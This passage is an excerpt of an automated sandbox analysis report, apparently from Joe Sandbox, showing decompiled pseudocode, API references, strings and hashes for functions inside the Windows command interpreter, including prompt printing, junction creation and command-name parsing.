													goto L83;
												}
										}
									}
									_t41 = _t125 + 0xd83b94; // 0x450000
									E00D9274C(_t201, _t214, L"%c",  *_t41 & 0x0000ffff);
									_t222 = _t222 + 0x10;
									_t196 = _t201;
									_v656 = _t196 + 2;
									do {
										_t136 =  *_t196;
										_t196 = _t196 + 2;
									} while (_t136 != 0);
									_t189 = _t196 - _v656;
									goto L83;
								}
								_t167 = 0;
								goto L28;
							}
							E00D9274C(_t201, _t209, L"%c", _t122 & 0x0000ffff);
							_t222 = _t222 + 0x10;
							_t191 = _t201;
							_t18 = _t191 + 2; // 0x2
							_v656 = _t18;
							_t174 = 0;
							do {
								_t142 =  *_t191;
								_t191 = _t191 + 2;
							} while (_t142 != 0);
							_t193 = _t191 - _v656 >> 1;
							_t201 = _t201 + _t193 * 2;
							_v652 = _t201;
							_t209 = _t209 - _t193;
							_v648 = _t209;
							if(E00D868B5() == 0) {
								L22:
								_v672 = _t174;
								goto L85;
							}
							_v656 =  *_v660 & 0x0000ffff;
							if(E00DA7AB0( *_v660 & 0x0000ffff) == 0) {
								_t174 = 0;
								goto L22;
							}
							_v672 = _v656 & 0x0000ffff;
							goto L85;
						}
						goto L91;
					}
				}
			}

0x00da6ff3
0x00da6ff5
0x00da6ff6
0x00da6ffa
0x00da7001
0x00da7005
0x00da7007
0x00da7009
0x00da700e
0x00da7019
0x00da701a
0x00da701b
0x00da701c
0x00da701d
0x00da7023
0x00da7028
0x00da702b
0x00da702d
0x00da7032
0x00da7033
0x00da7036
0x00da703c
0x00da7041
0x00da7047
0x00da704d
0x00da704f
0x00da7050
0x00da7055
0x00da7062
0x00da7068
0x00da7074
0x00da7074
0x00da707a
0x00da7080
0x00da7678
0x00da767b
0x00da7683
0x00da7684
0x00da7695
0x00da7086
0x00da7086
0x00da708c
0x00da7093
0x00da7098
0x00da70a0
0x00da70b9
0x00da70bb
0x00da70c3
0x00da70d0
0x00da70d8
0x00da70dd
0x00da70dd
0x00da70a2
0x00da70a7
0x00da70a7
0x00da70e4
0x00da70ec
0x00da70ee
0x00da70ee
0x00da70f4
0x00da70fa
0x00da7105
0x00da710a
0x00da7112
0x00000000
0x00da7118
0x00da7118
0x00da711a
0x00da7122
0x00da712b
0x00da712c
0x00da7132
0x00da713a
0x00da75eb
0x00da75eb
0x00da75f2
0x00da75f4
0x00da75f4
0x00da7600
0x00da7607
0x00da760f
0x00da7611
0x00da7611
0x00da7616
0x00da7616
0x00da7619
0x00da761c
0x00da7625
0x00da7628
0x00da7628
0x00da762a
0x00da762c
0x00da762f
0x00da7635
0x00da7637
0x00da7637
0x00da763a
0x00da763a
0x00da763d
0x00da7640
0x00da7647
0x00da764b
0x00da7657
0x00da765f
0x00da7665
0x00da7672
0x00da7672
0x00000000
0x00da7657
0x00da7140
0x00da7146
0x00000000
0x00000000
0x00000000
0x00da714c
0x00da7159
0x00da71ed
0x00da71f0
0x00da71f6
0x00da71fe
0x00da7200
0x00da720a
0x00da7220
0x00da7224
0x00da7224
0x00da722a
0x00da7230
0x00da7235
0x00000000
0x00000000
0x00da723b
0x00da723b
0x00da7245
0x00da724b
0x00da7251
0x00000000
0x00000000
0x00da7257
0x00da7257
0x00da7261
0x00da729d
0x00da729d
0x00da72a3
0x00da7582
0x00da7582
0x00da7589
0x00da758b
0x00da758b
0x00da759b
0x00da75a0
0x00da75a3
0x00da75a8
0x00da75b0
0x00da75b0
0x00da75b3
0x00da75b6
0x00da75bb
0x00da75c1
0x00da75c1
0x00da75c3
0x00da75c5
0x00da75c8
0x00da75c8
0x00da75ce
0x00da75d4
0x00da75da
0x00da75dd
0x00da75e3
0x00000000
0x00da75e3
0x00da72a9
0x00000000
0x00da72b7
0x00000000
0x00000000
0x00da72c8
0x00da72ca
0x00da72cb
0x00da72cd
0x00da72bc
0x00da72bc
0x00da72bf
0x00000000
0x00000000
0x00da72d4
0x00da72db
0x00da72dd
0x00da72dd
0x00da72ea
0x00da72f2
0x00da72f4
0x00da72f7
0x00da72fd
0x00da72ff
0x00da72ff
0x00da7302
0x00da7305
0x00da730a
0x00000000
0x00000000
0x00da7315
0x00da731d
0x00da732b
0x00da7343
0x00da7349
0x00da734b
0x00da734e
0x00da7350
0x00da7350
0x00da7353
0x00da7356
0x00da735b
0x00da735d
0x00000000
0x00000000
0x00da7370
0x00da7375
0x00da7377
0x00da7377
0x00da737d
0x00da737f
0x00da7381
0x00da7386
0x00da7388
0x00da738b
0x00da7391
0x00da7393
0x00da7393
0x00da7396
0x00da7399
0x00da739e
0x00000000
0x00000000
0x00da73ae
0x00da73b0
0x00da73b2
0x00da73b7
0x00da73b9
0x00da73bc
0x00da73c2
0x00da73c4
0x00da73c4
0x00da73c7
0x00da73ca
0x00da73cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00da73e1
0x00000000
0x00000000
0x00da73e7
0x00da7410
0x00da73ef
0x00da73f1
0x00da73f4
0x00000000
0x00000000
0x00da73fa
0x00da73fc
0x00da73fd
0x00da7400
0x00da7403
0x00da7409
0x00da740a
0x00da740a
0x00000000
0x00000000
0x00da7421
0x00000000
0x00000000
0x00da7427
0x00da742d
0x00da7435
0x00da7437
0x00da7439
0x00da7439
0x00da743e
0x00da7441
0x00da7447
0x00da7449
0x00da7449
0x00da744e
0x00da7452
0x00da7456
0x00da7458
0x00da7459
0x00da745d
0x00da745f
0x00da7463
0x00da7470
0x00000000
0x00da7476
0x00da7476
0x00da7478
0x00da747c
0x00da7486
0x00da7489
0x00da7490
0x00da74b2
0x00da7492
0x00da7492
0x00da7498
0x00da7499
0x00da749f
0x00da74a0
0x00da74a3
0x00da74a4
0x00da74aa
0x00da74aa
0x00da74bc
0x00da750b
0x00da755a
0x00da7562
0x00da7564
0x00da7567
0x00da756d
0x00da756f
0x00da756f
0x00da7572
0x00da7575
0x00da757a
0x00da750d
0x00da7517
0x00000000
0x00000000
0x00da751d
0x00da7522
0x00da7523
0x00da7524
0x00da7529
0x00da752c
0x00da752e
0x00da7531
0x00da7537
0x00da7539
0x00da7539
0x00da753c
0x00da753f
0x00da7544
0x00da7544
0x00000000
0x00da750b
0x00000000
0x00da72a9
0x00da7263
0x00da7272
0x00da7277
0x00da727a
0x00da727f
0x00da7287
0x00da7287
0x00da728a
0x00da728d
0x00da7292
0x00000000
0x00da7292
0x00da7239
0x00000000
0x00da7239
0x00da716a
0x00da716f
0x00da7172
0x00da7174
0x00da7177
0x00da717d
0x00da717f
0x00da717f
0x00da7182
0x00da7185
0x00da7190
0x00da7192
0x00da7195
0x00da719b
0x00da719d
0x00da71aa
0x00da71dc
0x00da71dc
0x00000000
0x00da71dc
0x00da71b5
0x00da71c4
0x00da71da
0x00000000
0x00da71da
0x00da71cf
0x00000000
0x00da71cf
0x00000000
0x00da714c
0x00da7112

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(35C4FBB8,?,00000000), ref: 00DA7062
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00DA7074

Part of subcall function 00D8CFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DAF830,00002000,?,?,?,?,?,00D9373A,00D8590A,00000000), ref: 00D8CFDF

towupper.MSVCRT ref: 00DA720E
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00DA7343
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00D81EB4,00D83958), ref: 00DA7467
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,35C4FBB8,?,00000000), ref: 00DA765F
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00DA7672

Strings

Unknown, xrefs: 00DA751D
PROMPT, xrefs: 00DA70AF
%s , xrefs: 00DA7553
%s>, xrefs: 00DA75FA

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
String ID: %s $%s>$PROMPT$Unknown
API String ID: 708651206-3050974680
Opcode ID: e63d6ea568326a34d6d43038b3765f10d7f27d56064e1e4e2f311878ab7da605
Instruction ID: 6dcabafd1b3ebd8a78ff882f82a962b2160c3647bd380dcf7f3f6f63585e56f1
Opcode Fuzzy Hash: e63d6ea568326a34d6d43038b3765f10d7f27d56064e1e4e2f311878ab7da605
Instruction Fuzzy Hash: 6902D775D052169BCF64EF28CC49ABAB7B5EB45700F18819AE809E7350DB309E81DF74

Uniqueness

Uniqueness Score: -1.00%

Function 00DAB5E0, Relevance: 19.7, APIs: 13, Instructions: 180
filememorynativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00DAB5E0(void* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v48;
				void* _t60;
				void _t64;
				void* _t68;
				signed int _t77;
				void _t80;
				signed short _t81;
				long _t88;
				WCHAR* _t91;
				void* _t97;
				intOrPtr* _t102;
				void* _t104;
				void* _t109;
				void* _t111;
				long _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t115 = __ecx;
				_v40 = 0;
				_t114 = 1;
				_v16 = 0;
				_v36 = 0;
				_v24 = 0;
				_t91 = E00DAB51A( *((intOrPtr*)(__ecx + 8)));
				_t116 = E00DAB51A( *((intOrPtr*)(_t115 + 0xc)));
				if(_t91 == 0 || _t116 == 0) {
					L19:
					if(_v36 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
					}
					if(_t114 != 0 && _v24 != 0) {
						RemoveDirectoryW(_t91);
					}
					return _t114;
				} else {
					if(E00DAB9D3(_t91, 0, 1) != 0) {
						if(E00DAB91D(_t116) != 0) {
							if(CreateDirectoryW(_t91, 0) == 0) {
								goto L19;
							}
							_v24 = 1;
							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v20 = _t60;
							if(_t60 == 0xffffffff) {
								goto L19;
							}
							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
							_t97 = _t116;
							_t10 = _t97 + 2; // 0x2
							_t109 = _t10;
							do {
								_t64 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t64 != _v16);
							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
							_t68 = E00D900B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
							_v12 = _t68;
							if(_t68 == 0) {
								_t117 = _v20;
								L18:
								CloseHandle(_t117);
								goto L19;
							}
							memset(_t68, 0, _v8);
							_t102 = _v12;
							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
							 *_t102 = 0xa0000003;
							 *((short*)(_t102 + 8)) = 0;
							 *((short*)(_t102 + 0xa)) = _v40;
							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
							_t111 = _v12;
							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
							_v32 = _t77;
							_t104 = _t116;
							 *((short*)(_t111 + 0xc)) = _t77 + 2;
							_t31 = _t104 + 2; // 0x2
							_v28 = _t31;
							do {
								_t80 =  *_t104;
								_t104 = _t104 + 2;
							} while (_t80 != _v16);
							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
							 *(_t111 + 0xe) = _t81;
							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
							_t117 = _v20;
							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
							if(_t88 >= 0) {
								_t114 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L18;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L19;
					}
					_push(0x4000272e);
					goto L4;
				}
			}

0x00dab5ea
0x00dab5f1
0x00dab5f4
0x00dab5f5
0x00dab5fb
0x00dab5fe
0x00dab609
0x00dab610
0x00dab614
0x00dab7a2
0x00dab7a6
0x00dab7b7
0x00dab7b7
0x00dab7bf
0x00dab7c8
0x00dab7c8
0x00dab7d6
0x00dab622
0x00dab62e
0x00dab649
0x00dab65e
0x00000000
0x00000000
0x00dab666
0x00dab679
0x00dab67f
0x00dab685
0x00000000
0x00000000
0x00dab694
0x00dab69a
0x00dab69c
0x00dab69c
0x00dab69f
0x00dab69f
0x00dab6a2
0x00dab6a5
0x00dab6bb
0x00dab6be
0x00dab6c3
0x00dab6c8
0x00dab798
0x00dab79b
0x00dab79c
0x00000000
0x00dab79c
0x00dab6d5
0x00dab6da
0x00dab6e6
0x00dab6ef
0x00dab6f5
0x00dab6fd
0x00dab70a
0x00dab70f
0x00dab715
0x00dab71e
0x00dab721
0x00dab723
0x00dab727
0x00dab72a
0x00dab72d
0x00dab72d
0x00dab730
0x00dab733
0x00dab73e
0x00dab741
0x00dab756
0x00dab75e
0x00dab778
0x00dab780
0x00dab794
0x00dab782
0x00dab78a
0x00dab78a
0x00000000
0x00dab780
0x00dab64b
0x00dab635
0x00dab635
0x00000000
0x00dab635
0x00dab630
0x00000000
0x00dab630

APIs

Part of subcall function 00DAB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00DAB533
Part of subcall function 00DAB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 00DAB54F

Part of subcall function 00DAB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 00DAB560

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 00DAB635
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00DAB656
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00DAB679
RtlDosPathNameToNtPathName_U.NTDLL ref: 00DAB694
memset.MSVCRT ref: 00DAB6D5
memcpy.MSVCRT ref: 00DAB70A
memcpy.MSVCRT ref: 00DAB756
NtFsControlFile.NTDLL ref: 00DAB778
RtlNtStatusToDosError.NTDLL ref: 00DAB783
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00DAB78A
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00DAB79C
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 00DAB7B7
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DAB7C8

Part of subcall function 00DAB9D3: memset.MSVCRT ref: 00DABA0F
Part of subcall function 00DAB9D3: memset.MSVCRT ref: 00DABA37
Part of subcall function 00DAB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00DABAA8
Part of subcall function 00DAB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00DABAC7
Part of subcall function 00DAB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00DABB0B

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
String ID:
API String ID: 223857506-0
Opcode ID: 475a323523af1c3460f8ef2b41b2c4a211f5c2138e2ef323ebe32992d22c5c67
Instruction ID: 1767a59bdc92912a07842e519a15ef823096ae3ec0a47cdfadcd7b971ce21b2e
Opcode Fuzzy Hash: 475a323523af1c3460f8ef2b41b2c4a211f5c2138e2ef323ebe32992d22c5c67
Instruction Fuzzy Hash: 0351AB71900206ABDB049FB4CC59ABEB7B8EF89310B18456AF806E7251E775DD02CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D8E040, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00D8E040(long __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				signed int _v549;
				long _v556;
				long _v560;
				signed int _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				int _t85;
				void* _t89;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t92;
				intOrPtr _t96;
				long _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t110;
				int _t111;
				signed char _t113;
				void* _t114;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				long _t130;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t134;
				long _t136;
				void* _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				long _t150;
				long _t151;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t143 = __edx;
				_t81 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t81 ^ _t152;
				_v560 = __edx;
				_t150 = __ecx;
				_v549 = 0;
				_v556 = __ecx;
				_t122 = _t121 | 0xffffffff;
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t154 = _t153 + 0xc;
				if(_v24 == 0) {
					_t85 = 0x104;
				} else {
					_t85 = 0x7fe7;
				}
				_t124 =  &_v548;
				if(E00D90C70(_t124, _t85) < 0) {
					_t147 = 0xfffffffe;
					goto L31;
				} else {
					_t148 = 0;
					while(_t148 < 0x7fe6) {
						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
						_t116 = 0;
						if(_t150 == 0x22) {
							_t117 = _v549;
							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
							_v549 = _t124;
							if(_t117 == 0) {
								_t116 = 0;
							} else {
								_t116 = 1;
							}
							L8:
							if(_t124 != 0 || _t116 != 0) {
								L11:
								if(_t122 != 0xffffffff) {
									L13:
									_t118 = _v28;
									if(_t118 == 0) {
										_t118 =  &_v548;
									}
									 *(_t118 + _t148 * 2) = _t150;
									_t148 = _t148 + 1;
									_t150 = _v556;
									continue;
								}
								_t119 = wcschr(L":.\\", _t150);
								_t154 = _t154 + 8;
								if(_t119 != 0) {
									if( *0xdc3cc9 == 0) {
										break;
									}
									_t122 = _t148;
								}
								goto L13;
							} else {
								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
								_t154 = _t154 + 8;
								if(_t120 != 0) {
									break;
								}
								goto L11;
							}
						}
						if(_t150 == 0) {
							break;
						}
						_t124 = _v549;
						goto L8;
					}
					_v564 = _t148;
					if(_t148 == 0) {
						_t147 = _t148 | 0xffffffff;
						L31:
						__imp__??_V@YAXPAX@Z();
						return E00D96FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
					}
					_t89 = _v28;
					if(_t89 == 0) {
						_t89 =  &_v548;
					}
					 *((short*)(_t89 + _t148 * 2)) = 0;
					if(_t122 != 0xffffffff) {
						_t90 = _v28;
						if(_t90 == 0) {
							_t90 =  &_v548;
						}
						_t91 = GetFileAttributesW(_t90);
						if(_t91 != 0xffffffff) {
							if((_t91 & 0x00000010) == 0) {
								goto L18;
							}
							goto L54;
						} else {
							L54:
							_t114 = _v28;
							_v564 = _t122;
							if(_t114 == 0) {
								_t114 =  &_v548;
							}
							 *((short*)(_t114 + _t122 * 2)) = 0;
							goto L18;
						}
					} else {
						L18:
						_t122 = _v28;
						if(_t122 == 0) {
							_t122 =  &_v548;
						}
						_t149 = 0;
						_t150 = 0xd81628;
						do {
							_t24 = _t150 - 8; // 0xd835b0
							_t92 =  *_t24;
							if(_t92 == 0) {
								goto L22;
							}
							__imp___wcsicmp(_t122, _t92);
							_t154 = _t154 + 8;
							if(_t92 == 0) {
								_t113 =  *_t150 & 0x0000ffff;
								if((_t113 & 0x00000004) != 0) {
									if( *0xdc3cc9 != 0) {
										goto L25;
									}
									goto L22;
								}
								L25:
								_t128 = _v560;
								 *_v560 = _t113;
								L26:
								 *0xdad0dc = _t149;
								if(_t149 == 0xffffffff) {
									if(_v28 == 0) {
										_t143 =  &_v548;
									}
									_t129 = 0x2d;
									if(E00D8DFC0(0x2d, _t143, _t128) == 0x2d) {
										_t147 = 0x2d;
									} else {
										_v549 = 0;
										_t122 = 0;
										while(1) {
											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
											if(_t150 == 0) {
												break;
											}
											_t109 = 0;
											if(_t150 == 0x22) {
												_t110 = _v549;
												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
												_v549 = _t129;
												if(_t110 == 0) {
													_t109 = 0;
												} else {
													_t109 = 1;
												}
											} else {
												_t129 = _v549;
											}
											if(_t129 == 0) {
												if(_t109 != 0) {
													goto L42;
												}
												_t111 = iswspace(_t150);
												_t154 = _t154 + 4;
												if(_t111 != 0) {
													break;
												}
												_t129 = L"=,;";
												if(E00D8D7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
													break;
												} else {
													goto L42;
												}
											} else {
												L42:
												_t122 = _t122 + 1;
												continue;
											}
										}
										_t130 = _v556;
										L28:
										_t131 =  *((intOrPtr*)(_t130 + 0x38));
										_t32 = _t131 + 2; // 0x2
										_t143 = _t32;
										do {
											_t96 =  *_t131;
											_t131 = _t131 + 2;
										} while (_t96 != 0);
										_t133 = _t131 - _t143 >> 1;
										if(_t122 != _t133) {
											_t66 = _t133 + 1; // -1
											_t151 = _t66;
											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
											if(_t134 == 0) {
												L76:
												_t136 = E00D900B0(_t151 + _t151);
												_v560 = _t136;
												if(_t136 == 0) {
													E00DA9287(_t136);
													__imp__longjmp(0xdbb8b8, 1);
												}
												_t122 = _t122 + _t122;
												_t143 = _t151;
												E00D91040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
													_t150 = _v560;
												} else {
													_t143 = _t151;
													_t150 = _v560;
													E00D918C0(_t150, _t151, _t103);
												}
												_t104 = _v556;
												 *(_t104 + 0x3c) = _t150;
												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
												goto L31;
											}
											_t145 = _t134 + 2;
											do {
												_t108 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t108 != 0);
											_t151 = _t151 + (_t134 - _t145 >> 1);
											goto L76;
										}
									}
									goto L31;
								}
								_t130 = _v556;
								_t122 = _v564;
								if(_t149 == 0x14) {
									 *((intOrPtr*)(_t130 + 0x40)) = 1;
								}
								goto L28;
							}
							L22:
							_t150 = _t150 + 0x18;
							_t149 = _t149 + 1;
						} while (_t150 <= 0xd81a18);
						_t128 = _v560;
						_t149 = _t149 | 0xffffffff;
						goto L26;
					}
				}
			}

0x00d8e040
0x00d8e04b
0x00d8e052
0x00d8e063
0x00d8e069
0x00d8e06b
0x00d8e075
0x00d8e07b
0x00d8e07e
0x00d8e085
0x00d8e089
0x00d8e090
0x00d8e095
0x00d8e09c
0x00d9bd1d
0x00d8e0a2
0x00d8e0a2
0x00d8e0a2
0x00d8e0a8
0x00d8e0b5
0x00d9bd27
0x00000000
0x00d8e0bb
0x00d8e0bb
0x00d8e0c0
0x00d8e0cb
0x00d8e0cf
0x00d8e0d4
0x00d8e212
0x00d8e21a
0x00d8e21d
0x00d8e225
0x00d8e310
0x00d8e22b
0x00d8e22b
0x00d8e22b
0x00d8e0e5
0x00d8e0e7
0x00d8e100
0x00d8e103
0x00d8e11c
0x00d8e11c
0x00d8e121
0x00d9bd31
0x00d9bd31
0x00d8e127
0x00d8e12b
0x00d8e12c
0x00000000
0x00d8e12c
0x00d8e10b
0x00d8e111
0x00d8e116
0x00d8e2d8
0x00000000
0x00000000
0x00d8e2de
0x00d8e2de
0x00000000
0x00d8e0ed
0x00d8e0f3
0x00d8e0f9
0x00d8e0fe
0x00000000
0x00000000
0x00000000
0x00d8e0fe
0x00d8e0e7
0x00d8e0dd
0x00000000
0x00000000
0x00d8e0df
0x00000000
0x00d8e0df
0x00d8e134
0x00d8e13c
0x00d9bd3c
0x00d8e1ea
0x00d8e1ed
0x00d8e208
0x00d8e208
0x00d8e142
0x00d8e147
0x00d9bd44
0x00d9bd44
0x00d8e14f
0x00d8e156
0x00d8e2e5
0x00d8e2ea
0x00d8e328
0x00d8e328
0x00d8e2ed
0x00d8e2f6
0x00d8e320
0x00000000
0x00000000
0x00000000
0x00d8e2f8
0x00d8e2f8
0x00d8e2f8
0x00d8e2fb
0x00d8e303
0x00d8e330
0x00d8e330
0x00d8e307
0x00000000
0x00d8e307
0x00d8e15c
0x00d8e15c
0x00d8e15c
0x00d8e161
0x00d9bd4f
0x00d9bd4f
0x00d8e167
0x00d8e169
0x00d8e170
0x00d8e170
0x00d8e170
0x00d8e175
0x00000000
0x00000000
0x00d8e179
0x00d8e17f
0x00d8e184
0x00d8e19d
0x00d8e1a2
0x00d9bd61
0x00000000
0x00000000
0x00000000
0x00d9bd67
0x00d8e1a8
0x00d8e1a8
0x00d8e1ae
0x00d8e1b1
0x00d8e1b1
0x00d8e1ba
0x00d8e237
0x00d9bd6c
0x00d9bd6c
0x00d8e23e
0x00d8e24b
0x00d9bd77
0x00d8e251
0x00d8e251
0x00d8e258
0x00d8e260
0x00d8e269
0x00d8e270
0x00000000
0x00000000
0x00d8e272
0x00d8e277
0x00d8e2b8
0x00d8e2c0
0x00d8e2c3
0x00d8e2cb
0x00d8e317
0x00d8e2cd
0x00d8e2cd
0x00d8e2cd
0x00d8e279
0x00d8e279
0x00d8e279
0x00d8e281
0x00d8e288
0x00000000
0x00000000
0x00d8e28b
0x00d8e291
0x00d8e296
0x00000000
0x00000000
0x00d8e29a
0x00d8e2a6
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8e283
0x00d8e283
0x00d8e283
0x00000000
0x00d8e283
0x00d8e281
0x00d8e2ad
0x00d8e1cd
0x00d8e1cd
0x00d8e1d0
0x00d8e1d0
0x00d8e1d3
0x00d8e1d3
0x00d8e1d6
0x00d8e1d9
0x00d8e1e0
0x00d8e1e4
0x00d9bd87
0x00d9bd87
0x00d9bd8a
0x00d9bd8f
0x00d9bda5
0x00d9bdad
0x00d9bdaf
0x00d9bdb7
0x00d9bdb9
0x00d9bdc5
0x00d9bdc5
0x00d9bdd1
0x00d9bdd3
0x00d9bddb
0x00d9bde6
0x00d9bdeb
0x00d9bdff
0x00d9bded
0x00d9bded
0x00d9bdef
0x00d9bdf8
0x00d9bdf8
0x00d9be05
0x00d9be0d
0x00d9be13
0x00000000
0x00d9be13
0x00d9bd91
0x00d9bd94
0x00d9bd94
0x00d9bd97
0x00d9bd9a
0x00d9bda3
0x00000000
0x00d9bda3
0x00d8e1e4
0x00000000
0x00d8e24b
0x00d8e1bc
0x00d8e1c2
0x00d8e1cb
0x00d8e209
0x00d8e209
0x00000000
0x00d8e1cb
0x00d8e186
0x00d8e186
0x00d8e189
0x00d8e18a
0x00d8e192
0x00d8e198
0x00000000
0x00d8e198
0x00d8e156

APIs

memset.MSVCRT ref: 00D8E090

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

wcschr.MSVCRT ref: 00D8E0F3
wcschr.MSVCRT ref: 00D8E10B
_wcsicmp.MSVCRT ref: 00D8E179
??_V@YAXPAX@Z.MSVCRT ref: 00D8E1ED
iswspace.MSVCRT ref: 00D8E28B
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 00D8E2ED

Strings

=,;, xrefs: 00D8E29A
=,;+/[] ", xrefs: 00D8E0EE
:.\, xrefs: 00D8E106

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
String ID: :.\$=,;$=,;+/[] "
API String ID: 313872294-843887632
Opcode ID: f7f0cbb5f2d8d49a14be4a2fdea610b3cae94733894481eff2676d6eab4c6b22
Instruction ID: eeea71a0860b1d9232ce59acd9d5974962697c3a98cce53342f515183a6fd786
Opcode Fuzzy Hash: f7f0cbb5f2d8d49a14be4a2fdea610b3cae94733894481eff2676d6eab4c6b22
